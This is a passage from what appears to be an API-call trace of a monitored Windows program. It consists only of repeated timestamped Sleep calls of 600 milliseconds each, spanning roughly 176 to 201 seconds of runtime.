(dwMilliseconds=0x258) [0176.218] Sleep (dwMilliseconds=0x258) [0176.276] Sleep (dwMilliseconds=0x258) [0176.322] Sleep (dwMilliseconds=0x258) [0176.323] Sleep (dwMilliseconds=0x258) [0176.649] Sleep (dwMilliseconds=0x258) [0176.688] Sleep (dwMilliseconds=0x258) [0176.761] Sleep (dwMilliseconds=0x258) [0176.811] Sleep (dwMilliseconds=0x258) [0176.822] Sleep (dwMilliseconds=0x258) [0177.056] Sleep (dwMilliseconds=0x258) [0177.292] Sleep (dwMilliseconds=0x258) [0177.408] Sleep (dwMilliseconds=0x258) [0177.540] Sleep (dwMilliseconds=0x258) [0177.565] Sleep (dwMilliseconds=0x258) [0177.571] Sleep (dwMilliseconds=0x258) [0177.586] Sleep (dwMilliseconds=0x258) [0177.776] Sleep (dwMilliseconds=0x258) [0177.792] Sleep (dwMilliseconds=0x258) [0177.806] Sleep (dwMilliseconds=0x258) [0177.829] Sleep (dwMilliseconds=0x258) [0177.961] Sleep (dwMilliseconds=0x258) [0177.982] Sleep (dwMilliseconds=0x258) [0177.992] Sleep (dwMilliseconds=0x258) [0178.008] Sleep (dwMilliseconds=0x258) [0178.023] Sleep (dwMilliseconds=0x258) [0178.044] Sleep (dwMilliseconds=0x258) [0178.057] Sleep (dwMilliseconds=0x258) [0178.085] Sleep (dwMilliseconds=0x258) [0178.134] Sleep (dwMilliseconds=0x258) [0178.152] Sleep (dwMilliseconds=0x258) [0178.164] Sleep (dwMilliseconds=0x258) [0178.179] Sleep (dwMilliseconds=0x258) [0178.195] Sleep (dwMilliseconds=0x258) [0178.210] Sleep (dwMilliseconds=0x258) [0178.226] Sleep (dwMilliseconds=0x258) [0178.241] Sleep (dwMilliseconds=0x258) [0178.305] Sleep (dwMilliseconds=0x258) [0178.319] Sleep (dwMilliseconds=0x258) [0178.338] Sleep (dwMilliseconds=0x258) [0178.358] Sleep (dwMilliseconds=0x258) [0178.367] Sleep (dwMilliseconds=0x258) [0178.383] Sleep (dwMilliseconds=0x258) [0178.399] Sleep (dwMilliseconds=0x258) [0178.460] Sleep (dwMilliseconds=0x258) [0178.481] Sleep (dwMilliseconds=0x258) [0178.491] Sleep (dwMilliseconds=0x258) [0178.507] Sleep (dwMilliseconds=0x258) [0178.523] Sleep (dwMilliseconds=0x258) [0178.538] Sleep (dwMilliseconds=0x258) [0178.553] Sleep (dwMilliseconds=0x258) [0178.569] Sleep (dwMilliseconds=0x258) [0178.632] Sleep (dwMilliseconds=0x258) [0178.654] Sleep (dwMilliseconds=0x258) [0178.663] Sleep (dwMilliseconds=0x258) [0178.678] Sleep (dwMilliseconds=0x258) [0178.695] Sleep (dwMilliseconds=0x258) [0178.709] Sleep (dwMilliseconds=0x258) [0178.726] Sleep (dwMilliseconds=0x258) [0178.772] Sleep (dwMilliseconds=0x258) [0178.820] Sleep (dwMilliseconds=0x258) [0178.860] Sleep (dwMilliseconds=0x258) [0178.866] Sleep (dwMilliseconds=0x258) [0178.881] Sleep (dwMilliseconds=0x258) [0178.897] Sleep (dwMilliseconds=0x258) [0178.912] Sleep (dwMilliseconds=0x258) [0178.928] Sleep (dwMilliseconds=0x258) [0178.943] Sleep (dwMilliseconds=0x258) [0179.006] Sleep (dwMilliseconds=0x258) [0179.022] Sleep (dwMilliseconds=0x258) [0179.037] Sleep (dwMilliseconds=0x258) [0179.060] Sleep (dwMilliseconds=0x258) [0179.068] Sleep (dwMilliseconds=0x258) [0179.091] Sleep (dwMilliseconds=0x258) [0179.100] Sleep (dwMilliseconds=0x258) [0179.162] Sleep (dwMilliseconds=0x258) [0179.180] Sleep (dwMilliseconds=0x258) [0179.193] Sleep (dwMilliseconds=0x258) [0179.209] Sleep (dwMilliseconds=0x258) [0179.224] Sleep (dwMilliseconds=0x258) [0179.241] Sleep (dwMilliseconds=0x258) [0179.258] Sleep (dwMilliseconds=0x258) [0179.272] Sleep (dwMilliseconds=0x258) [0179.333] Sleep (dwMilliseconds=0x258) [0179.352] Sleep (dwMilliseconds=0x258) [0179.381] Sleep (dwMilliseconds=0x258) [0179.396] Sleep (dwMilliseconds=0x258) [0179.411] Sleep (dwMilliseconds=0x258) [0179.427] Sleep (dwMilliseconds=0x258) [0179.491] Sleep (dwMilliseconds=0x258) [0179.505] Sleep (dwMilliseconds=0x258) [0179.521] Sleep (dwMilliseconds=0x258) [0179.536] Sleep (dwMilliseconds=0x258) [0179.552] Sleep (dwMilliseconds=0x258) [0179.567] Sleep (dwMilliseconds=0x258) [0179.594] Sleep (dwMilliseconds=0x258) [0179.645] Sleep (dwMilliseconds=0x258) [0179.662] Sleep (dwMilliseconds=0x258) [0179.692] Sleep (dwMilliseconds=0x258) [0179.708] Sleep (dwMilliseconds=0x258) [0179.723] Sleep (dwMilliseconds=0x258) [0179.739] Sleep (dwMilliseconds=0x258) [0179.802] Sleep (dwMilliseconds=0x258) [0179.825] Sleep (dwMilliseconds=0x258) [0179.847] Sleep (dwMilliseconds=0x258) [0179.849] Sleep (dwMilliseconds=0x258) [0179.864] Sleep (dwMilliseconds=0x258) [0179.880] Sleep (dwMilliseconds=0x258) [0179.895] Sleep (dwMilliseconds=0x258) [0179.911] Sleep (dwMilliseconds=0x258) [0179.973] Sleep (dwMilliseconds=0x258) [0180.004] Sleep (dwMilliseconds=0x258) [0180.004] Sleep (dwMilliseconds=0x258) [0180.020] Sleep (dwMilliseconds=0x258) [0180.035] Sleep (dwMilliseconds=0x258) [0180.055] Sleep (dwMilliseconds=0x258) [0180.068] Sleep (dwMilliseconds=0x258) [0180.092] Sleep (dwMilliseconds=0x258) [0180.145] Sleep (dwMilliseconds=0x258) [0180.160] Sleep (dwMilliseconds=0x258) [0180.176] Sleep (dwMilliseconds=0x258) [0180.207] Sleep (dwMilliseconds=0x258) [0180.223] Sleep (dwMilliseconds=0x258) [0180.238] Sleep (dwMilliseconds=0x258) [0180.301] Sleep (dwMilliseconds=0x258) [0180.316] Sleep (dwMilliseconds=0x258) [0180.332] Sleep (dwMilliseconds=0x258) [0180.347] Sleep (dwMilliseconds=0x258) [0180.363] Sleep (dwMilliseconds=0x258) [0180.379] Sleep (dwMilliseconds=0x258) [0180.394] Sleep (dwMilliseconds=0x258) [0180.457] Sleep (dwMilliseconds=0x258) [0180.474] Sleep (dwMilliseconds=0x258) [0181.406] Sleep (dwMilliseconds=0x258) [0181.408] Sleep (dwMilliseconds=0x258) [0181.430] Sleep (dwMilliseconds=0x258) [0181.440] Sleep (dwMilliseconds=0x258) [0181.502] Sleep (dwMilliseconds=0x258) [0181.518] Sleep (dwMilliseconds=0x258) [0181.533] Sleep (dwMilliseconds=0x258) [0181.549] Sleep (dwMilliseconds=0x258) [0181.564] Sleep (dwMilliseconds=0x258) [0181.581] Sleep (dwMilliseconds=0x258) [0181.596] Sleep (dwMilliseconds=0x258) [0181.658] Sleep (dwMilliseconds=0x258) [0181.683] Sleep (dwMilliseconds=0x258) [0181.689] Sleep (dwMilliseconds=0x258) [0181.705] Sleep (dwMilliseconds=0x258) [0181.733] Sleep (dwMilliseconds=0x258) [0181.736] Sleep (dwMilliseconds=0x258) [0181.752] Sleep (dwMilliseconds=0x258) [0181.768] Sleep (dwMilliseconds=0x258) [0181.817] Sleep (dwMilliseconds=0x258) [0181.843] Sleep (dwMilliseconds=0x258) [0181.845] Sleep (dwMilliseconds=0x258) [0181.862] Sleep (dwMilliseconds=0x258) [0181.879] Sleep (dwMilliseconds=0x258) [0181.892] Sleep (dwMilliseconds=0x258) [0181.907] Sleep (dwMilliseconds=0x258) [0181.923] Sleep (dwMilliseconds=0x258) [0181.985] Sleep (dwMilliseconds=0x258) [0182.001] Sleep (dwMilliseconds=0x258) [0182.020] Sleep (dwMilliseconds=0x258) [0182.033] Sleep (dwMilliseconds=0x258) [0182.048] Sleep (dwMilliseconds=0x258) [0182.064] Sleep (dwMilliseconds=0x258) [0182.082] Sleep (dwMilliseconds=0x258) [0182.142] Sleep (dwMilliseconds=0x258) [0182.497] Sleep (dwMilliseconds=0x258) [0182.502] Sleep (dwMilliseconds=0x258) [0182.516] Sleep (dwMilliseconds=0x258) [0182.531] Sleep (dwMilliseconds=0x258) [0182.547] Sleep (dwMilliseconds=0x258) [0182.563] Sleep (dwMilliseconds=0x258) [0182.579] Sleep (dwMilliseconds=0x258) [0182.641] Sleep (dwMilliseconds=0x258) [0182.664] Sleep (dwMilliseconds=0x258) [0182.672] Sleep (dwMilliseconds=0x258) [0182.688] Sleep (dwMilliseconds=0x258) [0182.703] Sleep (dwMilliseconds=0x258) [0182.719] Sleep (dwMilliseconds=0x258) [0182.735] Sleep (dwMilliseconds=0x258) [0182.750] Sleep (dwMilliseconds=0x258) [0182.812] Sleep (dwMilliseconds=0x258) [0182.839] Sleep (dwMilliseconds=0x258) [0182.844] Sleep (dwMilliseconds=0x258) [0182.859] Sleep (dwMilliseconds=0x258) [0182.875] Sleep (dwMilliseconds=0x258) [0182.890] Sleep (dwMilliseconds=0x258) [0182.907] Sleep (dwMilliseconds=0x258) [0182.921] Sleep (dwMilliseconds=0x258) [0182.984] Sleep (dwMilliseconds=0x258) [0183.002] Sleep (dwMilliseconds=0x258) [0183.029] Sleep (dwMilliseconds=0x258) [0183.031] Sleep (dwMilliseconds=0x258) [0183.046] Sleep (dwMilliseconds=0x258) [0183.062] Sleep (dwMilliseconds=0x258) [0183.077] Sleep (dwMilliseconds=0x258) [0183.140] Sleep (dwMilliseconds=0x258) [0183.157] Sleep (dwMilliseconds=0x258) [0183.176] Sleep (dwMilliseconds=0x258) [0183.188] Sleep (dwMilliseconds=0x258) [0183.203] Sleep (dwMilliseconds=0x258) [0183.218] Sleep (dwMilliseconds=0x258) [0183.234] Sleep (dwMilliseconds=0x258) [0183.249] Sleep (dwMilliseconds=0x258) [0183.312] Sleep (dwMilliseconds=0x258) [0183.327] Sleep (dwMilliseconds=0x258) [0183.343] Sleep (dwMilliseconds=0x258) [0183.358] Sleep (dwMilliseconds=0x258) [0183.375] Sleep (dwMilliseconds=0x258) [0183.390] Sleep (dwMilliseconds=0x258) [0183.405] Sleep (dwMilliseconds=0x258) [0183.467] Sleep (dwMilliseconds=0x258) [0183.489] Sleep (dwMilliseconds=0x258) [0183.500] Sleep (dwMilliseconds=0x258) [0183.515] Sleep (dwMilliseconds=0x258) [0183.544] Sleep (dwMilliseconds=0x258) [0183.545] Sleep (dwMilliseconds=0x258) [0183.563] Sleep (dwMilliseconds=0x258) [0183.577] Sleep (dwMilliseconds=0x258) [0183.639] Sleep (dwMilliseconds=0x258) [0183.672] Sleep (dwMilliseconds=0x258) [0183.688] Sleep (dwMilliseconds=0x258) [0183.701] Sleep (dwMilliseconds=0x258) [0183.717] Sleep (dwMilliseconds=0x258) [0183.733] Sleep (dwMilliseconds=0x258) [0183.749] Sleep (dwMilliseconds=0x258) [0183.811] Sleep (dwMilliseconds=0x258) [0183.836] Sleep (dwMilliseconds=0x258) [0183.842] Sleep (dwMilliseconds=0x258) [0183.858] Sleep (dwMilliseconds=0x258) [0183.875] Sleep (dwMilliseconds=0x258) [0183.889] Sleep (dwMilliseconds=0x258) [0183.904] Sleep (dwMilliseconds=0x258) [0183.922] Sleep (dwMilliseconds=0x258) [0183.983] Sleep (dwMilliseconds=0x258) [0183.999] Sleep (dwMilliseconds=0x258) [0184.028] Sleep (dwMilliseconds=0x258) [0184.030] Sleep (dwMilliseconds=0x258) [0184.046] Sleep (dwMilliseconds=0x258) [0184.062] Sleep (dwMilliseconds=0x258) [0184.078] Sleep (dwMilliseconds=0x258) [0184.138] Sleep (dwMilliseconds=0x258) [0184.165] Sleep (dwMilliseconds=0x258) [0184.170] Sleep (dwMilliseconds=0x258) [0184.187] Sleep (dwMilliseconds=0x258) [0184.201] Sleep (dwMilliseconds=0x258) [0184.217] Sleep (dwMilliseconds=0x258) [0184.233] Sleep (dwMilliseconds=0x258) [0184.260] Sleep (dwMilliseconds=0x258) [0184.310] Sleep (dwMilliseconds=0x258) [0184.330] Sleep (dwMilliseconds=0x258) [0184.348] Sleep (dwMilliseconds=0x258) [0184.357] Sleep (dwMilliseconds=0x258) [0184.374] Sleep (dwMilliseconds=0x258) [0184.389] Sleep (dwMilliseconds=0x258) [0184.403] Sleep (dwMilliseconds=0x258) [0184.544] Sleep (dwMilliseconds=0x258) [0184.616] Sleep (dwMilliseconds=0x258) [0184.642] Sleep (dwMilliseconds=0x258) [0184.664] Sleep (dwMilliseconds=0x258) [0184.677] Sleep (dwMilliseconds=0x258) [0184.685] Sleep (dwMilliseconds=0x258) [0184.732] Sleep (dwMilliseconds=0x258) [0184.815] Sleep (dwMilliseconds=0x258) [0184.887] Sleep (dwMilliseconds=0x258) [0184.934] Sleep (dwMilliseconds=0x258) [0185.043] Sleep (dwMilliseconds=0x258) [0185.118] Sleep (dwMilliseconds=0x258) [0185.138] Sleep (dwMilliseconds=0x258) [0185.184] Sleep (dwMilliseconds=0x258) [0185.203] Sleep (dwMilliseconds=0x258) [0185.262] Sleep (dwMilliseconds=0x258) [0185.287] Sleep (dwMilliseconds=0x258) [0185.293] Sleep (dwMilliseconds=0x258) [0185.315] Sleep (dwMilliseconds=0x258) [0185.325] Sleep (dwMilliseconds=0x258) [0185.371] Sleep (dwMilliseconds=0x258) [0185.435] Sleep (dwMilliseconds=0x258) [0185.452] Sleep (dwMilliseconds=0x258) [0185.464] Sleep (dwMilliseconds=0x258) [0185.501] Sleep (dwMilliseconds=0x258) [0185.529] Sleep (dwMilliseconds=0x258) [0185.590] Sleep (dwMilliseconds=0x258) [0185.606] Sleep (dwMilliseconds=0x258) [0185.637] Sleep (dwMilliseconds=0x258) [0185.759] Sleep (dwMilliseconds=0x258) [0185.763] Sleep (dwMilliseconds=0x258) [0185.995] Sleep (dwMilliseconds=0x258) [0186.058] Sleep (dwMilliseconds=0x258) [0186.099] Sleep (dwMilliseconds=0x258) [0186.144] Sleep (dwMilliseconds=0x258) [0186.182] Sleep (dwMilliseconds=0x258) [0186.211] Sleep (dwMilliseconds=0x258) [0186.221] Sleep (dwMilliseconds=0x258) [0186.238] Sleep (dwMilliseconds=0x258) [0186.256] Sleep (dwMilliseconds=0x258) [0186.291] Sleep (dwMilliseconds=0x258) [0186.419] Sleep (dwMilliseconds=0x258) [0186.461] Sleep (dwMilliseconds=0x258) [0186.465] Sleep (dwMilliseconds=0x258) [0186.481] Sleep (dwMilliseconds=0x258) [0186.830] Sleep (dwMilliseconds=0x258) [0186.948] Sleep (dwMilliseconds=0x258) [0187.150] Sleep (dwMilliseconds=0x258) [0187.248] Sleep (dwMilliseconds=0x258) [0187.287] Sleep (dwMilliseconds=0x258) [0187.292] Sleep (dwMilliseconds=0x258) [0187.574] Sleep (dwMilliseconds=0x258) [0187.820] Sleep (dwMilliseconds=0x258) [0187.948] Sleep (dwMilliseconds=0x258) [0187.973] Sleep (dwMilliseconds=0x258) [0188.007] Sleep (dwMilliseconds=0x258) [0188.061] Sleep (dwMilliseconds=0x258) [0188.120] Sleep (dwMilliseconds=0x258) [0188.157] Sleep (dwMilliseconds=0x258) [0188.173] Sleep (dwMilliseconds=0x258) [0188.180] Sleep (dwMilliseconds=0x258) [0188.197] Sleep (dwMilliseconds=0x258) [0188.211] Sleep (dwMilliseconds=0x258) [0188.251] Sleep (dwMilliseconds=0x258) [0188.291] Sleep (dwMilliseconds=0x258) [0188.311] Sleep (dwMilliseconds=0x258) [0188.319] Sleep (dwMilliseconds=0x258) [0188.337] Sleep (dwMilliseconds=0x258) [0188.378] Sleep (dwMilliseconds=0x258) [0188.381] Sleep (dwMilliseconds=0x258) [0188.397] Sleep (dwMilliseconds=0x258) [0188.461] Sleep (dwMilliseconds=0x258) [0188.476] Sleep (dwMilliseconds=0x258) [0188.491] Sleep (dwMilliseconds=0x258) [0188.506] Sleep (dwMilliseconds=0x258) [0188.523] Sleep (dwMilliseconds=0x258) [0188.545] Sleep (dwMilliseconds=0x258) [0188.553] Sleep (dwMilliseconds=0x258) [0188.615] Sleep (dwMilliseconds=0x258) [0188.631] Sleep (dwMilliseconds=0x258) [0188.648] Sleep (dwMilliseconds=0x258) [0188.663] Sleep (dwMilliseconds=0x258) [0188.678] Sleep (dwMilliseconds=0x258) [0188.693] Sleep (dwMilliseconds=0x258) [0188.709] Sleep (dwMilliseconds=0x258) [0188.772] Sleep (dwMilliseconds=0x258) [0188.790] Sleep (dwMilliseconds=0x258) [0188.803] Sleep (dwMilliseconds=0x258) [0188.819] Sleep (dwMilliseconds=0x258) [0188.834] Sleep (dwMilliseconds=0x258) [0188.849] Sleep (dwMilliseconds=0x258) [0188.865] Sleep (dwMilliseconds=0x258) [0188.881] Sleep (dwMilliseconds=0x258) [0188.944] Sleep (dwMilliseconds=0x258) [0188.959] Sleep (dwMilliseconds=0x258) [0188.974] Sleep (dwMilliseconds=0x258) [0188.990] Sleep (dwMilliseconds=0x258) [0189.006] Sleep (dwMilliseconds=0x258) [0189.021] Sleep (dwMilliseconds=0x258) [0189.037] Sleep (dwMilliseconds=0x258) [0189.052] Sleep (dwMilliseconds=0x258) [0189.115] Sleep (dwMilliseconds=0x258) [0189.130] Sleep (dwMilliseconds=0x258) [0189.146] Sleep (dwMilliseconds=0x258) [0189.161] Sleep (dwMilliseconds=0x258) [0189.177] Sleep (dwMilliseconds=0x258) [0189.193] Sleep (dwMilliseconds=0x258) [0189.208] Sleep (dwMilliseconds=0x258) [0189.271] Sleep (dwMilliseconds=0x258) [0189.288] Sleep (dwMilliseconds=0x258) [0189.302] Sleep (dwMilliseconds=0x258) [0189.334] Sleep (dwMilliseconds=0x258) [0189.362] Sleep (dwMilliseconds=0x258) [0189.364] Sleep (dwMilliseconds=0x258) [0189.427] Sleep (dwMilliseconds=0x258) [0189.442] Sleep (dwMilliseconds=0x258) [0189.458] Sleep (dwMilliseconds=0x258) [0189.479] Sleep (dwMilliseconds=0x258) [0189.928] Sleep (dwMilliseconds=0x258) [0190.414] Sleep (dwMilliseconds=0x258) [0190.479] Sleep (dwMilliseconds=0x258) [0190.488] Sleep (dwMilliseconds=0x258) [0190.503] Sleep (dwMilliseconds=0x258) [0190.519] Sleep (dwMilliseconds=0x258) [0190.534] Sleep (dwMilliseconds=0x258) [0191.004] Sleep (dwMilliseconds=0x258) [0191.046] Sleep (dwMilliseconds=0x258) [0191.066] Sleep (dwMilliseconds=0x258) [0191.332] Sleep (dwMilliseconds=0x258) [0191.408] Sleep (dwMilliseconds=0x258) [0191.473] Sleep (dwMilliseconds=0x258) [0191.533] Sleep (dwMilliseconds=0x258) [0191.580] Sleep (dwMilliseconds=0x258) [0191.669] Sleep (dwMilliseconds=0x258) [0191.720] Sleep (dwMilliseconds=0x258) [0191.782] Sleep (dwMilliseconds=0x258) [0192.080] Sleep (dwMilliseconds=0x258) [0192.095] Sleep (dwMilliseconds=0x258) [0192.142] Sleep (dwMilliseconds=0x258) [0192.164] Sleep (dwMilliseconds=0x258) [0192.173] Sleep (dwMilliseconds=0x258) [0192.235] Sleep (dwMilliseconds=0x258) [0192.252] Sleep (dwMilliseconds=0x258) [0192.266] Sleep (dwMilliseconds=0x258) [0192.281] Sleep (dwMilliseconds=0x258) [0192.297] Sleep (dwMilliseconds=0x258) [0192.313] Sleep (dwMilliseconds=0x258) [0192.329] Sleep (dwMilliseconds=0x258) [0192.392] Sleep (dwMilliseconds=0x258) [0192.406] Sleep (dwMilliseconds=0x258) [0192.422] Sleep (dwMilliseconds=0x258) [0192.437] Sleep (dwMilliseconds=0x258) [0192.453] Sleep (dwMilliseconds=0x258) [0192.469] Sleep (dwMilliseconds=0x258) [0192.484] Sleep (dwMilliseconds=0x258) [0192.547] Sleep (dwMilliseconds=0x258) [0192.566] Sleep (dwMilliseconds=0x258) [0192.606] Sleep (dwMilliseconds=0x258) [0192.616] Sleep (dwMilliseconds=0x258) [0192.665] Sleep (dwMilliseconds=0x258) [0192.749] Sleep (dwMilliseconds=0x258) [0192.794] Sleep (dwMilliseconds=0x258) [0192.797] Sleep (dwMilliseconds=0x258) [0192.817] Sleep (dwMilliseconds=0x258) [0192.836] Sleep (dwMilliseconds=0x258) [0192.870] Sleep (dwMilliseconds=0x258) [0192.876] Sleep (dwMilliseconds=0x258) [0192.952] Sleep (dwMilliseconds=0x258) [0192.983] Sleep (dwMilliseconds=0x258) [0192.983] Sleep (dwMilliseconds=0x258) [0192.999] Sleep (dwMilliseconds=0x258) [0193.018] Sleep (dwMilliseconds=0x258) [0193.033] Sleep (dwMilliseconds=0x258) [0193.195] Sleep (dwMilliseconds=0x258) [0193.249] Sleep (dwMilliseconds=0x258) [0193.403] Sleep (dwMilliseconds=0x258) [0193.405] Sleep (dwMilliseconds=0x258) [0193.434] Sleep (dwMilliseconds=0x258) [0193.451] Sleep (dwMilliseconds=0x258) [0193.499] Sleep (dwMilliseconds=0x258) [0193.611] Sleep (dwMilliseconds=0x258) [0193.641] Sleep (dwMilliseconds=0x258) [0193.687] Sleep (dwMilliseconds=0x258) [0193.709] Sleep (dwMilliseconds=0x258) [0193.733] Sleep (dwMilliseconds=0x258) [0193.827] Sleep (dwMilliseconds=0x258) [0193.891] Sleep (dwMilliseconds=0x258) [0193.966] Sleep (dwMilliseconds=0x258) [0194.065] Sleep (dwMilliseconds=0x258) [0194.123] Sleep (dwMilliseconds=0x258) [0194.173] Sleep (dwMilliseconds=0x258) [0194.294] Sleep (dwMilliseconds=0x258) [0194.368] Sleep (dwMilliseconds=0x258) [0194.394] Sleep (dwMilliseconds=0x258) [0194.403] Sleep (dwMilliseconds=0x258) [0194.772] Sleep (dwMilliseconds=0x258) [0194.825] Sleep (dwMilliseconds=0x258) [0195.001] Sleep (dwMilliseconds=0x258) [0195.315] Sleep (dwMilliseconds=0x258) [0195.324] Sleep (dwMilliseconds=0x258) [0195.355] Sleep (dwMilliseconds=0x258) [0195.502] Sleep (dwMilliseconds=0x258) [0195.557] Sleep (dwMilliseconds=0x258) [0195.585] Sleep (dwMilliseconds=0x258) [0195.592] Sleep (dwMilliseconds=0x258) [0195.687] Sleep (dwMilliseconds=0x258) [0196.146] Sleep (dwMilliseconds=0x258) [0196.370] Sleep (dwMilliseconds=0x258) [0196.388] Sleep (dwMilliseconds=0x258) [0196.438] Sleep (dwMilliseconds=0x258) [0196.485] Sleep (dwMilliseconds=0x258) [0196.572] Sleep (dwMilliseconds=0x258) [0196.612] Sleep (dwMilliseconds=0x258) [0196.624] Sleep (dwMilliseconds=0x258) [0196.642] Sleep (dwMilliseconds=0x258) [0196.652] Sleep (dwMilliseconds=0x258) [0196.666] Sleep (dwMilliseconds=0x258) [0196.701] Sleep (dwMilliseconds=0x258) [0196.774] Sleep (dwMilliseconds=0x258) [0196.804] Sleep (dwMilliseconds=0x258) [0196.806] Sleep (dwMilliseconds=0x258) [0196.821] Sleep (dwMilliseconds=0x258) [0196.844] Sleep (dwMilliseconds=0x258) [0196.856] Sleep (dwMilliseconds=0x258) [0196.868] Sleep (dwMilliseconds=0x258) [0196.930] Sleep (dwMilliseconds=0x258) [0196.952] Sleep (dwMilliseconds=0x258) [0196.961] Sleep (dwMilliseconds=0x258) [0196.977] Sleep (dwMilliseconds=0x258) [0196.993] Sleep (dwMilliseconds=0x258) [0197.008] Sleep (dwMilliseconds=0x258) [0197.024] Sleep (dwMilliseconds=0x258) [0197.040] Sleep (dwMilliseconds=0x258) [0197.102] Sleep (dwMilliseconds=0x258) [0197.121] Sleep (dwMilliseconds=0x258) [0197.140] Sleep (dwMilliseconds=0x258) [0197.149] Sleep (dwMilliseconds=0x258) [0197.165] Sleep (dwMilliseconds=0x258) [0197.185] Sleep (dwMilliseconds=0x258) [0197.208] Sleep (dwMilliseconds=0x258) [0197.259] Sleep (dwMilliseconds=0x258) [0197.292] Sleep (dwMilliseconds=0x258) [0197.307] Sleep (dwMilliseconds=0x258) [0197.339] Sleep (dwMilliseconds=0x258) [0197.352] Sleep (dwMilliseconds=0x258) [0197.375] Sleep (dwMilliseconds=0x258) [0197.392] Sleep (dwMilliseconds=0x258) [0197.449] Sleep (dwMilliseconds=0x258) [0197.471] Sleep (dwMilliseconds=0x258) [0197.478] Sleep (dwMilliseconds=0x258) [0197.492] Sleep (dwMilliseconds=0x258) [0197.507] Sleep (dwMilliseconds=0x258) [0197.523] Sleep (dwMilliseconds=0x258) [0197.539] Sleep (dwMilliseconds=0x258) [0197.554] Sleep (dwMilliseconds=0x258) [0197.617] Sleep (dwMilliseconds=0x258) [0197.639] Sleep (dwMilliseconds=0x258) [0197.648] Sleep (dwMilliseconds=0x258) [0197.663] Sleep (dwMilliseconds=0x258) [0197.679] Sleep (dwMilliseconds=0x258) [0197.695] Sleep (dwMilliseconds=0x258) [0197.724] Sleep (dwMilliseconds=0x258) [0197.726] Sleep (dwMilliseconds=0x258) [0197.789] Sleep (dwMilliseconds=0x258) [0197.804] Sleep (dwMilliseconds=0x258) [0197.819] Sleep (dwMilliseconds=0x258) [0197.835] Sleep (dwMilliseconds=0x258) [0197.851] Sleep (dwMilliseconds=0x258) [0197.868] Sleep (dwMilliseconds=0x258) [0197.882] Sleep (dwMilliseconds=0x258) [0197.944] Sleep (dwMilliseconds=0x258) [0197.970] Sleep (dwMilliseconds=0x258) [0197.976] Sleep (dwMilliseconds=0x258) [0197.992] Sleep (dwMilliseconds=0x258) [0198.007] Sleep (dwMilliseconds=0x258) [0198.022] Sleep (dwMilliseconds=0x258) [0198.038] Sleep (dwMilliseconds=0x258) [0198.078] Sleep (dwMilliseconds=0x258) [0198.122] Sleep (dwMilliseconds=0x258) [0198.164] Sleep (dwMilliseconds=0x258) [0198.182] Sleep (dwMilliseconds=0x258) [0198.196] Sleep (dwMilliseconds=0x258) [0198.212] Sleep (dwMilliseconds=0x258) [0198.225] Sleep (dwMilliseconds=0x258) [0198.241] Sleep (dwMilliseconds=0x258) [0198.304] Sleep (dwMilliseconds=0x258) [0198.319] Sleep (dwMilliseconds=0x258) [0198.397] Sleep (dwMilliseconds=0x258) [0198.490] Sleep (dwMilliseconds=0x258) [0198.510] Sleep (dwMilliseconds=0x258) [0198.522] Sleep (dwMilliseconds=0x258) [0198.537] Sleep (dwMilliseconds=0x258) [0198.553] Sleep (dwMilliseconds=0x258) [0198.834] Sleep (dwMilliseconds=0x258) [0198.849] Sleep (dwMilliseconds=0x258) [0198.912] Sleep (dwMilliseconds=0x258) [0198.939] Sleep (dwMilliseconds=0x258) [0198.953] Sleep (dwMilliseconds=0x258) [0198.973] Sleep (dwMilliseconds=0x258) [0198.974] Sleep (dwMilliseconds=0x258) [0198.989] Sleep (dwMilliseconds=0x258) [0199.006] Sleep (dwMilliseconds=0x258) [0199.025] Sleep (dwMilliseconds=0x258) [0199.083] Sleep (dwMilliseconds=0x258) [0199.106] Sleep (dwMilliseconds=0x258) [0199.114] Sleep (dwMilliseconds=0x258) [0199.130] Sleep (dwMilliseconds=0x258) [0199.148] Sleep (dwMilliseconds=0x258) [0199.161] Sleep (dwMilliseconds=0x258) [0199.185] Sleep (dwMilliseconds=0x258) [0199.192] Sleep (dwMilliseconds=0x258) [0199.256] Sleep (dwMilliseconds=0x258) [0199.282] Sleep (dwMilliseconds=0x258) [0199.291] Sleep (dwMilliseconds=0x258) [0199.303] Sleep (dwMilliseconds=0x258) [0199.317] Sleep (dwMilliseconds=0x258) [0199.333] Sleep (dwMilliseconds=0x258) [0199.348] Sleep (dwMilliseconds=0x258) [0199.370] Sleep (dwMilliseconds=0x258) [0199.426] Sleep (dwMilliseconds=0x258) [0199.451] Sleep (dwMilliseconds=0x258) [0200.036] Sleep (dwMilliseconds=0x258) [0200.052] Sleep (dwMilliseconds=0x258) [0200.088] Sleep (dwMilliseconds=0x258) [0200.160] Sleep (dwMilliseconds=0x258) [0200.176] Sleep (dwMilliseconds=0x258) [0200.191] Sleep (dwMilliseconds=0x258) [0200.206] Sleep (dwMilliseconds=0x258) [0200.224] Sleep (dwMilliseconds=0x258) [0200.241] Sleep (dwMilliseconds=0x258) [0200.256] Sleep (dwMilliseconds=0x258) [0200.347] Sleep (dwMilliseconds=0x258) [0200.380] Sleep (dwMilliseconds=0x258) [0200.394] Sleep (dwMilliseconds=0x258) [0200.409] Sleep (dwMilliseconds=0x258) [0200.427] Sleep (dwMilliseconds=0x258) [0200.440] Sleep (dwMilliseconds=0x258) [0200.459] Sleep (dwMilliseconds=0x258) [0200.479] Sleep (dwMilliseconds=0x258) [0200.534] Sleep (dwMilliseconds=0x258) [0200.565] Sleep (dwMilliseconds=0x258) [0200.581] Sleep (dwMilliseconds=0x258) [0200.596] Sleep (dwMilliseconds=0x258) [0200.614] Sleep (dwMilliseconds=0x258) [0200.635] Sleep (dwMilliseconds=0x258) [0200.656] Sleep (dwMilliseconds=0x258) [0200.706] Sleep (dwMilliseconds=0x258) [0200.730] Sleep (dwMilliseconds=0x258) [0200.752] Sleep (dwMilliseconds=0x258) [0200.768] Sleep (dwMilliseconds=0x258) [0200.792] Sleep (dwMilliseconds=0x258) [0200.810] Sleep (dwMilliseconds=0x258) [0200.816] Sleep (dwMilliseconds=0x258) [0200.877] Sleep (dwMilliseconds=0x258) [0200.893] Sleep (dwMilliseconds=0x258) [0200.929] Sleep (dwMilliseconds=0x258) [0200.946] Sleep (dwMilliseconds=0x258) [0200.972] Sleep (dwMilliseconds=0x258) [0201.035] Sleep (dwMilliseconds=0x258) [0201.064] Sleep (dwMilliseconds=0x258) [0201.096] Sleep (dwMilliseconds=0x258) [0201.117] Sleep (dwMilliseconds=0x258) [0201.127] Sleep (dwMilliseconds=0x258) [0201.143] Sleep (dwMilliseconds=0x258) [0201.213] Sleep (dwMilliseconds=0x258) [0201.241] Sleep (dwMilliseconds=0x258) [0201.251] Sleep (dwMilliseconds=0x258) [0201.280] 